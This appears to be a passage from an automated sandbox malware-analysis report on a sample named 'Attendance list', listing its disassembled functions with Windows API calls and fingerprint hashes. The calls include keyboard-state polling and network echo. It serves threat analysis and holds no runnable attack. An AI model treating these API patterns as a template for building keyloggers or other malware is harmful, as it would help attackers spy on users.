                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                        • String ID: BUTTON
                        • API String ID: 1194449130-3405671355
                        • Opcode ID: 7a757c69d986c8de5483c76110fd370e359b30dac4a522689d1fce2813b4bd09
                        • Instruction ID: c99c936f34fc2f3a5b89973ac0c44012f2fa21cd7411aef2a516d10a59d9d185
                        • Opcode Fuzzy Hash: 7a757c69d986c8de5483c76110fd370e359b30dac4a522689d1fce2813b4bd09
                        • Instruction Fuzzy Hash: FC21A17422D706EFE7009B60FD98F2A7B69EB86396F111424F015852B5DB759C40AB32
                        Function 0092D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • CoInitialize.OLE32(00000000), ref: 0092D855
                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0092D8E8
                        • SHGetDesktopFolder.SHELL32(?), ref: 0092D8FC
                        • CoCreateInstance.OLE32(00952D7C,00000000,00000001,0097A89C,?), ref: 0092D948
                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0092D9B7
                        • CoTaskMemFree.OLE32(?,?), ref: 0092DA0F
                        • _memset.LIBCMT ref: 0092DA4C
                        • SHBrowseForFolderW.SHELL32(?), ref: 0092DA88
                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0092DAAB
                        • CoTaskMemFree.OLE32(00000000), ref: 0092DAB2
                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0092DAE9
                        • CoUninitialize.OLE32(00000001,00000000), ref: 0092DAEB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                        • String ID:
                        • API String ID: 1246142700-0
                        • Opcode ID: 633c5c896ce96303ae2d64933af6b14cb726d56d4b6fab65c8ada8af79474074
                        • Instruction ID: 0a9ece49163227f06cc8750ac294202f6892a0f203ff1f22b5aab5979965d662
                        • Opcode Fuzzy Hash: 633c5c896ce96303ae2d64933af6b14cb726d56d4b6fab65c8ada8af79474074
                        • Instruction Fuzzy Hash: FFB12E75A00119AFDB04DFA4D888EAEBBF9FF49304B1484A9F509EB261DB30ED41CB51
                        Function 0092052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 009205A7
                        • SetKeyboardState.USER32(?), ref: 00920612
                        • GetAsyncKeyState.USER32(000000A0), ref: 00920632
                        • GetKeyState.USER32(000000A0), ref: 00920649
                        • GetAsyncKeyState.USER32(000000A1), ref: 00920678
                        • GetKeyState.USER32(000000A1), ref: 00920689
                        • GetAsyncKeyState.USER32(00000011), ref: 009206B5
                        • GetKeyState.USER32(00000011), ref: 009206C3
                        • GetAsyncKeyState.USER32(00000012), ref: 009206EC
                        • GetKeyState.USER32(00000012), ref: 009206FA
                        • GetAsyncKeyState.USER32(0000005B), ref: 00920723
                        • GetKeyState.USER32(0000005B), ref: 00920731
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: 3b7c4cc66ba8fc24ce67f14a858237a8b80ea3e55d1b5b3226fd9fb390877af7
                        • Instruction ID: ae3376f365bdc0ebd850f6e0d9cb0ef590598aea1f67158baeb5c060971cb898
                        • Opcode Fuzzy Hash: 3b7c4cc66ba8fc24ce67f14a858237a8b80ea3e55d1b5b3226fd9fb390877af7
                        • Instruction Fuzzy Hash: 4A51FD30A047A819FB34DBB0A855BEABFBC9F91340F084599D5C2571C7DA649B4CCF61
                        Function 0091C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 0091C746
                        • GetWindowRect.USER32(00000000,?), ref: 0091C758
                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0091C7B6
                        • GetDlgItem.USER32(?,00000002), ref: 0091C7C1
                        • GetWindowRect.USER32(00000000,?), ref: 0091C7D3
                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0091C827
                        • GetDlgItem.USER32(?,000003E9), ref: 0091C835
                        • GetWindowRect.USER32(00000000,?), ref: 0091C846
                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0091C889
                        • GetDlgItem.USER32(?,000003EA), ref: 0091C897
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0091C8B4
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0091C8C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: e3019f3b186bb785c4586086d021a08643492936e6c4caeeb2bd1261e3cb361a
                        • Instruction ID: 7dd0ccba03f5760d289002d4c5f30cd3174add8e010a8233feba107d01a2ebaa
                        • Opcode Fuzzy Hash: e3019f3b186bb785c4586086d021a08643492936e6c4caeeb2bd1261e3cb361a
                        • Instruction Fuzzy Hash: E7515EB5B10209AFDB18CFA8DD99EAEBBBAEB89310F14812DF515D6290D7709D408B10
                        Function 008C201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008C2036,?,00000000,?,?,?,?,008C16CB,00000000,?), ref: 008C1B9A
                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008C20D3
                        • KillTimer.USER32(-00000001,?,?,?,?,008C16CB,00000000,?,?,008C1AE2,?,?), ref: 008C216E
                        • DestroyAcceleratorTable.USER32(00000000), ref: 008FBEF6
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008C16CB,00000000,?,?,008C1AE2,?,?), ref: 008FBF27
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008C16CB,00000000,?,?,008C1AE2,?,?), ref: 008FBF3E
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008C16CB,00000000,?,?,008C1AE2,?,?), ref: 008FBF5A
                        • DeleteObject.GDI32(00000000), ref: 008FBF6C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                        • String ID:
                        • API String ID: 641708696-0
                        • Opcode ID: 1a967e783f9e80c1934d42647f259bacd6d33c8f1fa8d41e8af5d1b535a6af1f
                        • Instruction ID: 9e53811e80920c1569ec28b53a45cae4e6f916dafaffa7a21f54f35c32efc2ca
                        • Opcode Fuzzy Hash: 1a967e783f9e80c1934d42647f259bacd6d33c8f1fa8d41e8af5d1b535a6af1f
                        • Instruction Fuzzy Hash: BB617834118A19DFCB259F28DD58F29B7F1FB41316F14842EE142CAAA0CB75E891EF81
                        Function 008C21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C25DB: GetWindowLongW.USER32(?,000000EB), ref: 008C25EC
                        • GetSysColor.USER32(0000000F), ref: 008C21D3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ColorLongWindow
                        • String ID:
                        • API String ID: 259745315-0
                        • Opcode ID: 1084e2933a83cd17acceebdd32d5ebbe2d386fbc8b72b42d9b2d8081014e2308
                        • Instruction ID: ffe8b6daac91e607b63b7ad51eda054b6c4b6b0cac072cbd348797755ac04109
                        • Opcode Fuzzy Hash: 1084e2933a83cd17acceebdd32d5ebbe2d386fbc8b72b42d9b2d8081014e2308
                        • Instruction Fuzzy Hash: 6F419E350081449EDB219F28DC98FB97B75FB06335F184269FE65CA1E2C7318D82EB21
                        Function 0092AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                        Download Yara Rule
                        APIs
                        • CharLowerBuffW.USER32(?,?,0094F910), ref: 0092AB76
                        • GetDriveTypeW.KERNEL32(00000061,0097A620,00000061), ref: 0092AC40
                        • _wcscpy.LIBCMT ref: 0092AC6A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: BuffCharDriveLowerType_wcscpy
                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                        • API String ID: 2820617543-1000479233
                        • Opcode ID: a7d07b3586d9330049dd77b7f1c3fa3ef6017740847470bb66dfe19f95101928
                        • Instruction ID: 0bd49c9c62d319b05a905482455f39b25dfe28b06c3b11791b7fd362857b8f2f
                        • Opcode Fuzzy Hash: a7d07b3586d9330049dd77b7f1c3fa3ef6017740847470bb66dfe19f95101928
                        • Instruction Fuzzy Hash: AA51BE322083119BC710EF18D891EAEB7A9FF81310F14882DF49A972A6DB31DD49CB53
                        Function 008C9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __i64tow__itow__swprintf
                        • String ID: %.15g$0x%p$False$True
                        • API String ID: 421087845-2263619337
                        • Opcode ID: 2aa98e497a0324f19b4283af7019a7e63da77a2b89dda44a72bb5d7a1b9fa0d3
                        • Instruction ID: 6b65284adfeda1d934c6303e93808c015f79c8d6909ba73f72979f6cda409c48
                        • Opcode Fuzzy Hash: 2aa98e497a0324f19b4283af7019a7e63da77a2b89dda44a72bb5d7a1b9fa0d3
                        • Instruction Fuzzy Hash: CD41E571604209ABDB249B39D845F7ABBF8FF45304F2044AEE689D7292EE71D9418B12
                        Function 009473C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 009473D9
                        • CreateMenu.USER32 ref: 009473F4
                        • SetMenu.USER32(?,00000000), ref: 00947403
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00947490
                        • IsMenu.USER32(?), ref: 009474A6
                        • CreatePopupMenu.USER32 ref: 009474B0
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009474DD
                        • DrawMenuBar.USER32 ref: 009474E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                        • String ID: 0$F
                        • API String ID: 176399719-3044882817
                        • Opcode ID: 75857bad5462b155fbba098e6232ae22629cc145726277b85d04bd791b8ed7cc
                        • Instruction ID: 41905a5e1899f34424cbc0a4a5a4b52117a256aa80f4a4a1ec2ce6cede175dca
                        • Opcode Fuzzy Hash: 75857bad5462b155fbba098e6232ae22629cc145726277b85d04bd791b8ed7cc
                        • Instruction Fuzzy Hash: 99415978A14209EFDB20DFA4D884EAABBFAFF49310F144428F955A7360D730A910DF50
                        Function 0094772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                        Download Yara Rule
                        APIs
                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009477CD
                        • CreateCompatibleDC.GDI32(00000000), ref: 009477D4
                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009477E7
                        • SelectObject.GDI32(00000000,00000000), ref: 009477EF
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 009477FA
                        • DeleteDC.GDI32(00000000), ref: 00947803
                        • GetWindowLongW.USER32(?,000000EC), ref: 0094780D
                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00947821
                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0094782D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                        • String ID: static
                        • API String ID: 2559357485-2160076837
                        • Opcode ID: 5c28f6f34aeefdbccc70e7a2542876034a41cae5d5527a4bd8fe8c8eeebda3e5
                        • Instruction ID: f91fbf75d949ee94e2110fb8608da9bd5048ac055b5b2b6a7a27cf2685d2048c
                        • Opcode Fuzzy Hash: 5c28f6f34aeefdbccc70e7a2542876034a41cae5d5527a4bd8fe8c8eeebda3e5
                        • Instruction Fuzzy Hash: 2331AF36119119BBDF115FA4DC48FDA3B6DFF4E324F110224FA15A61A0C731D811EBA0
                        Function 008E7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 008E707B
                          • Part of subcall function 008E8D68: __getptd_noexit.LIBCMT ref: 008E8D68
                        • __gmtime64_s.LIBCMT ref: 008E7114
                        • __gmtime64_s.LIBCMT ref: 008E714A
                        • __gmtime64_s.LIBCMT ref: 008E7167
                        • __allrem.LIBCMT ref: 008E71BD
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E71D9
                        • __allrem.LIBCMT ref: 008E71F0
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E720E
                        • __allrem.LIBCMT ref: 008E7225
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E7243
                        • __invoke_watson.LIBCMT ref: 008E72B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                        • String ID:
                        • API String ID: 384356119-0
                        • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                        • Instruction ID: af8122ebfc3fb5d7f5780ac5c1a0ccb263cc2c8af772b21ffd2a8cc66990dea6
                        • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                        • Instruction Fuzzy Hash: AE710B71A04B5BABD7149E7ECC41B6AB3A8FF12324F14423AF625E7681E770D9408791
                        Function 00922A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00922A31
                        • GetMenuItemInfoW.USER32(00986890,000000FF,00000000,00000030), ref: 00922A92
                        • SetMenuItemInfoW.USER32(00986890,00000004,00000000,00000030), ref: 00922AC8
                        • Sleep.KERNEL32(000001F4), ref: 00922ADA
                        • GetMenuItemCount.USER32(?), ref: 00922B1E
                        • GetMenuItemID.USER32(?,00000000), ref: 00922B3A
                        • GetMenuItemID.USER32(?,-00000001), ref: 00922B64
                        • GetMenuItemID.USER32(?,?), ref: 00922BA9
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00922BEF
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00922C03
                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00922C24
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                        • String ID:
                        • API String ID: 4176008265-0
                        • Opcode ID: 45c06160742cd0dc7c94f50215b72caf149ea9feed1ef0ff656faa6bc8c2fc75
                        • Instruction ID: 9a702e33102a4ae2e9b6d3bd1c22c10724badfc4f19c51de8c468c6731ceab24
                        • Opcode Fuzzy Hash: 45c06160742cd0dc7c94f50215b72caf149ea9feed1ef0ff656faa6bc8c2fc75
                        • Instruction Fuzzy Hash: F761AEB091425ABFDB21CF64E898EBE7BB8EB42304F1405A9F841A7255D731AD05DB21
                        Function 00947192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00947214
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00947217
                        • GetWindowLongW.USER32(?,000000F0), ref: 0094723B
                        • _memset.LIBCMT ref: 0094724C
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0094725E
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009472D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow_memset
                        • String ID:
                        • API String ID: 830647256-0
                        • Opcode ID: 96b8ff4d47b48ce6f3bfca6e4dfe3b6b14f4b6c5762467f81289a4bfb904435e
                        • Instruction ID: 578d9160ac0414df199170edc197c1c5ed67a4e1387e4e75c0f714dd48699acc
                        • Opcode Fuzzy Hash: 96b8ff4d47b48ce6f3bfca6e4dfe3b6b14f4b6c5762467f81289a4bfb904435e
                        • Instruction Fuzzy Hash: 26615A75A04208AFDB10DFA4CC81EEEB7F8EB49710F144159FA14AB3A1D774AE45DBA0
                        Function 0091710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00917135
                        • SafeArrayAllocData.OLEAUT32(?), ref: 0091718E
                        • VariantInit.OLEAUT32(?), ref: 009171A0
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 009171C0
                        • VariantCopy.OLEAUT32(?,?), ref: 00917213
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00917227
                        • VariantClear.OLEAUT32(?), ref: 0091723C
                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00917249
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00917252
                        • VariantClear.OLEAUT32(?), ref: 00917264
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0091726F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        • API String ID: 2706829360-0
                        • Opcode ID: 5bb6f0e86999348ac9159f5c6be405c8217a39130a904b479f87e5aac7ad812e
                        • Instruction ID: d60f56a6176bc46aff560397fe6e98f1a1f5c52c6492590cf83ac4ad35f0b331
                        • Opcode Fuzzy Hash: 5bb6f0e86999348ac9159f5c6be405c8217a39130a904b479f87e5aac7ad812e
                        • Instruction Fuzzy Hash: AF414235A0411EAFCF04DFA8D858DEEBBB9FF48354F008469F955A7261CB30A945CB90
                        Function 00935A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 00935AA6
                        • inet_addr.WSOCK32(?,?,?), ref: 00935AEB
                        • gethostbyname.WSOCK32(?), ref: 00935AF7
                        • IcmpCreateFile.IPHLPAPI ref: 00935B05
                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00935B75
                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00935B8B
                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00935C00
                        • WSACleanup.WSOCK32 ref: 00935C06
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
